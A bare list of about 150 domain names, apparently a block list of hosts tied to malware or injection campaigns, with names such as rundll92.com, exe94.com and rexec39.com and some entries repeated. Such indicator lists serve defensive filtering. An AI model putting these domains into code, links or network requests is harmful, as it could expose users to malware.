nihaorr1.com, free.hostpinoy.info, xprmn4u.info, nmidahena.com, winzipices.cn, sb.5252.ws, aspder.com, 11910.net, bbs.jueduizuan.com, bluell.cn, 2117966.net, s.see9.us, xvgaoke.cn, 1.hao929.cn, 414151.com, cc.18dd.net, yl18.net, kisswow.com.cn, urkb.net, c.uc8010.com, rnmb.net, ririwow.cn, killwow1.cn, xiaobaishan.net, qiqigm.com, wowgm1.cn, wowyeye.cn, 9i5t.cn, c11.8866.org, computershello.cn, tlcn.net, z008.net, b15.3322.org, qiqicc.cn, direct84.com, heihei117.cn, caocaowow.cn, qiuxuegm.com, locale48.com, firestnamestea.cn, fami4ka.net, redir94.com, rexec39.com, en-us18.com, ck1.in, adjuncnet.com, rundll92.com, sysid72.com, n.uc8010.com, libid53.com, qiqi111.cn, heartgames.cn, logid83.com, datajto.com, adw95.com, tjwh202.162.ns98.cn, jetadwor.com, cookieadw.com, bannerupd.com, nb88.cn, bigadnet.com, 1.cool0.biz, updatebnr.com, flyzhu.9966.org, sslnet72.com, advertbnr.com, script46.com, fengnima.cn, tag58.com, banner82.com, smeisp.cn, hoursebuilds.cn, hyperadw.com, adsitelo.com, okey123.cn, b.kaobt.cn, getadw.com, nihao112.com, al.99.vc, aidushu.net, a.13175.com, chliyi.com, free.edivid.info, 52-o.cn, fucksb.net, 0.actualization.cn, d39.6600.org, h28.8800.org, 001yl.com, ucmal.com, t.uc8010.com, dota11.cn, pingbnr.com, bnrcompro.com, y66.us, m11.3322.org, bc0.cn, clsidw.com, adword71.com, killpp.cn, bnradw.com, cmiia.com, sslput4.com, exe94.com, bnrcntrl.com, w11.6600.org, usuc.us, hlpadw.com, jumpbnr.com, advabnr.com, siteid38.com, msshamof.com, refer68.com, newasp.com.cn, wowgm2.cn, mm.jsjwh.com.cn, updatead.com, win496.com, usuc.us, view89.com, 17ge.cn, err68.com, upgradead.com, adword72.com, kk6.us, clickbnr.com, 117275.cn, c23.2288.org, sysid72.com, encode72.com, exec51.com, pingadw.com, vb008.cn, wow112.cn, nihaoel3.com, p060523.info, o7n9.cn, rundll841.com, jetdbs.com, dbdomaine.com, domaincld.com, clsiduser.com, heiheinn.cn, coldwop.com, alzhead.com, chinabnr.com, adwbnr.com, chkbnr.com, chkadw.com